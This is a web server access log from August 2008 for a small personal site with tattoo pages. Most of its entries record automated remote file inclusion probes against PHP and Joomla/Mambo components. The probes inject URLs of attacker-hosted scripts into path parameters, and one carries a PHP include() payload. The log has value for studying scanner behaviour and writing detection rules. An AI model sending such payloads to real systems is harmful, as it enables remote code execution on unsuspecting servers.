121.220.25.47 - - [16/Aug/2008:21:17:54 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:55 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:55 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:55 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 304 - "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.220.25.47 - - [16/Aug/2008:21:17:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.188.130.113 - - [16/Aug/2008:21:18:07 -0500] "GET /logs/access_log.1193270400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:21:18:07 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:21:18:08 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:18:46 -0500] "GET /logs/weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:18:50 -0500] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:18:50 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
212.150.247.23 - - [16/Aug/2008:21:18:50 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
69.64.34.172 - - [16/Aug/2008:21:19:51 -0500] "GET /logs/access_log.1211500800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:19:51 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:19:51 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:20:19 -0500] "GET /logs/access_log.1214524800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:20:19 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:20:19 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:21:03 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:21:29 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
212.150.247.23 - - [16/Aug/2008:21:21:49 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
89.208.43.121 - - [16/Aug/2008:21:23:08 -0500] "GET /logs/access_log.1214179200//agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.18.151.242 - - [16/Aug/2008:21:23:14 -0500] "GET /logs/access_log.1214438400/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 368 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:21:23:14 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:21:23:14 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:21:23:15 -0500] "GET /logs/access_log.1214438400/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 368 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:21:23:15 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 341 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:21:23:15 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 346 "-""libwww-perl/5.810"
69.64.34.172 - - [16/Aug/2008:21:23:38 -0500] "GET /logs/access_log.1214438400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
86.58.154.237 - - [16/Aug/2008:21:23:51 -0500] "GET /logs/access_log.1214524800////?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
86.58.154.237 - - [16/Aug/2008:21:23:52 -0500] "GET ////?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.79"
86.58.154.237 - - [16/Aug/2008:21:23:53 -0500] "GET /logs////?mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 95588 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:21:24:32 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
212.150.247.23 - - [16/Aug/2008:21:24:32 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
74.6.22.107 - - [16/Aug/2008:21:25:19 -0500] "GET /logs/access_log.1189728000 HTTP/1.0" 200 202988 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.73.189.205 - - [16/Aug/2008:21:25:25 -0500] "GET /logs/access_log.1193270400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:21:25:26 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:21:25:26 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:27:27 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
212.150.247.23 - - [16/Aug/2008:21:27:27 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
202.181.210.195 - - [16/Aug/2008:21:29:20 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
202.181.210.195 - - [16/Aug/2008:21:29:21 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.22.89.194 - - [16/Aug/2008:21:29:31 -0500] "GET /logs/access_log.1214438400/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:21:29:31 -0500] "GET /logs/access_log.1214438400/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:21:29:31 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:21:29:31 -0500] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:21:29:31 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:21:29:31 -0500] "GET /logs/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.812"
85.92.140.147 - - [16/Aug/2008:21:30:20 -0500] "GET /logs/access_log.1214524800/errors.php/?mosConfig_absolute_path=http://www.fox28.de/mambots/editors/botid.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:21:30:20 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Avant Browser (http://www.avantbrowser.com)"
212.150.247.23 - - [16/Aug/2008:21:30:20 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Avant Browser (http://www.avantbrowser.com)"
85.92.140.147 - - [16/Aug/2008:21:30:20 -0500] "GET /errors.php/?mosConfig_absolute_path=http://www.fox28.de/mambots/editors/botid.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
85.92.140.147 - - [16/Aug/2008:21:30:21 -0500] "GET /logs/errors.php/?mosConfig_absolute_path=http://www.fox28.de/mambots/editors/botid.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
87.106.77.242 - - [16/Aug/2008:21:31:00 -0500] "GET /logs/access_log.1214524800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
87.106.77.242 - - [16/Aug/2008:21:31:00 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
87.106.77.242 - - [16/Aug/2008:21:31:00 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
67.205.67.205 - - [16/Aug/2008:21:31:13 -0500] "GET /logs/access_log.1214179200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://utilz.info/a4?? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
67.205.67.205 - - [16/Aug/2008:21:31:13 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://utilz.info/a4?? HTTP/1.1" 404 329 "-""libwww-perl/5.805"
67.205.67.205 - - [16/Aug/2008:21:31:13 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://utilz.info/a4?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
67.18.151.242 - - [16/Aug/2008:21:31:15 -0500] "GET /logs/access_log.1211500800/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 368 "-""libwww-perl/5.810"
67.18.151.242 - - [16/Aug/2008:21:31:15 -0500] "GET /logs/access_log.1211500800/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.acoc.co.kr/acoc/board/icon/gd-bot-id.txt???? HTTP/1.1" 404 368 "-""libwww-perl/5.810"
87.106.77.242 - - [16/Aug/2008:21:31:19 -0500] "GET /logs/access_log.1211500800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
217.23.156.220 - - [16/Aug/2008:21:32:53 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:21:32:53 -0500] "GET //errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:21:32:54 -0500] "GET /logs//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:33:12 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.150.247.23 - - [16/Aug/2008:21:33:12 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
67.19.173.36 - - [16/Aug/2008:21:33:55 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:21:33:55 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:21:33:55 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:21:33:55 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:21:34:00 -0500] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:21:34:00 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
62.109.176.109 - - [16/Aug/2008:21:34:57 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:35:00 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
122.49.120.85 - - [16/Aug/2008:21:35:19 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
122.49.120.85 - - [16/Aug/2008:21:35:20 -0500] "GET //errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
122.49.120.85 - - [16/Aug/2008:21:35:20 -0500] "GET /logs//errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
212.150.247.23 - - [16/Aug/2008:21:35:52 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Advanced Browser (http://www.avantbrowser.com)"
212.150.247.23 - - [16/Aug/2008:21:35:52 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Advanced Browser (http://www.avantbrowser.com)"
64.22.89.194 - - [16/Aug/2008:21:36:18 -0500] "GET /logs/access_log.1211500800/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:21:36:23 -0500] "GET /logs/access_log.1211500800/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.812"
80.67.24.32 - - [16/Aug/2008:21:36:33 -0500] "GET /logs//errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 300 "-""libwww-perl/5.808"
80.67.24.32 - - [16/Aug/2008:21:36:33 -0500] "GET //errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 295 "-""libwww-perl/5.808"
217.23.156.220 - - [16/Aug/2008:21:37:55 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:21:37:56 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:21:37:56 -0500] "GET //errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:21:37:57 -0500] "GET /logs//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:38:28 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.150.247.23 - - [16/Aug/2008:21:38:28 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
74.6.25.46 - - [16/Aug/2008:21:40:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [16/Aug/2008:21:40:19 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.64.34.172 - - [16/Aug/2008:21:40:21 -0500] "GET /logs/access_log.1213488000////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:40:21 -0500] "GET ////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:21:40:22 -0500] "GET /logs////?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 95588 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:41:19 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:21:41:23 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:21:41:32 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
212.150.247.23 - - [16/Aug/2008:21:41:32 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
87.106.77.242 - - [16/Aug/2008:21:41:50 -0500] "GET /logs/access_log.1214179200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.devilhouse.org/temp/alb2?? HTTP/1.1" 404 371 "-""libwww-perl/5.803"
58.25.217.217 - - [16/Aug/2008:21:41:51 -0500] "GET /logs/access_log.1209600000/index2.php?ln=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
58.25.217.217 - - [16/Aug/2008:21:41:56 -0500] "GET /index2.php?ln=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
58.25.217.217 - - [16/Aug/2008:21:41:59 -0500] "GET /logs/index2.php?ln=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
122.49.120.85 - - [16/Aug/2008:21:42:13 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://royray.com/ezupload/.../memei.jpg??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
67.19.173.36 - - [16/Aug/2008:21:42:27 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
69.61.106.55 - - [16/Aug/2008:21:42:29 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.812"
67.19.173.36 - - [16/Aug/2008:21:42:32 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
67.19.173.36 - - [16/Aug/2008:21:42:37 -0500] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
74.6.22.107 - - [16/Aug/2008:21:43:51 -0500] "GET /logs/access_log.1201910400 HTTP/1.0" 200 333495 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.150.247.23 - - [16/Aug/2008:21:44:04 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
212.150.247.23 - - [16/Aug/2008:21:44:04 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
122.108.234.16 - - [16/Aug/2008:21:44:14 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://en.wikipedia.org/wiki/Flash_(tattoo)""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
